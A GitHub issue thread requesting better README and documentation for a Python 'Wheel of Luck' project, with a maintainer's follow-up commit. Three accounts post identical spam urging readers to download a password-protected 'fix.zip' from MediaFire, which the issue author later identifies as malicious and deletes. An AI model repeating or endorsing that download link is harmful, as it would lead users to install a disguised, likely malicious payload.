### ISSUE TITLE
Improve readme and documentation standard

### ISSUE THREAD

**Issue by R4tmax** [Teg3z/Wheel-of-Luck#15]
I am going to enter a subjective opinion here: 

It is **very** hard for me, as a person who did not work on the core codebase (ie. the GUI and the primary logic) to actually make heads of tails of the code.
I am aware the code documentation is inconvenient, and I do not have a clear idea how to fix this issue. 

At the bare minimum, I think there are improvements to be made in the readme.md - it should contain. 

1. Intro (description etc. - ie. what we already have in the readme.md) 
2. How to build it (wheel_of_luck.py is the main script, it is not _clearly_ apparent out of the box tho)  ?
3. How to run it ?
4. How to use it?
5. Release notes (optional)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by R4tmax** [comment]
Unfortunately there is a limit of github support requests one can make 🤦 . 

Reported what I could and deleted malicious comments.

**Comment by Teg3z** [comment]
I keep forgetting to mention issues in commits, so:

- [ccffa36](https://github.com/Teg3z/Wheel-of-Luck/commit/ccffa36705375bcb4c70dbddf50b613c485d7194)

In this commit I have provided setup info basically for developers, not yet descriped the Pyinstaller process. Although I we might just have an executable made on each new release, so the user doesnt have to use Pyinstaller?

**Comment by R4tmax** [comment]
As you said above, current state of affairs with the installer is not ideal, I suspect it wont be supported longterm
